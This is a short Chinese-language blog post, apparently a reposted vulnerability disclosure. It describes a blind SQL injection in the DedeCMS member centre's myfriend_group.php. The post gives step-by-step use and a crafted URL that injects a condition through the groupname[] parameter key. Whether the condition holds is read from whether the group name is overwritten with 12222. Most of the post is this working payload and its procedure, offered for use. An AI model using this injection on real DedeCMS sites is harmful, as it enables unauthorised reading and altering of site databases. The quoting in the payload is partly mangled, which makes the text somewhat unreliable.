Dedecms 会员中心注入漏洞10

文章目录

漏洞作者: Matt

[/crayon]

 

漏洞证明:

利用方法

先打开127.0.0.1/dede/member/myfriend_group.php随便添加一个

然后看源码里groupname[]中的值

因为没有返回 只能盲注

那么判断是否满足条件就看是否update了原来的数据

这样就easy 执行一下语句

127.0.0.1/dede/member/myfriend_group.php?dopost=save&groupname[3′ or @'

and (select 1)%3D1 and ‘1]=12222

如果(select 1)=1的话 那个groupname就会被改成12222

上面的3改成你的groupname的ID就哦了

 

14195649c11ad3e54e89b48fad77c683e6930296

14195700b4029548935ad097cdcb1a0dddb143a2

测试前

14195748ea50adfb11dca08534dd0b35923ffc75

测试后

14195725bd4e3ad876a92b576b60503ad9ff581f

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录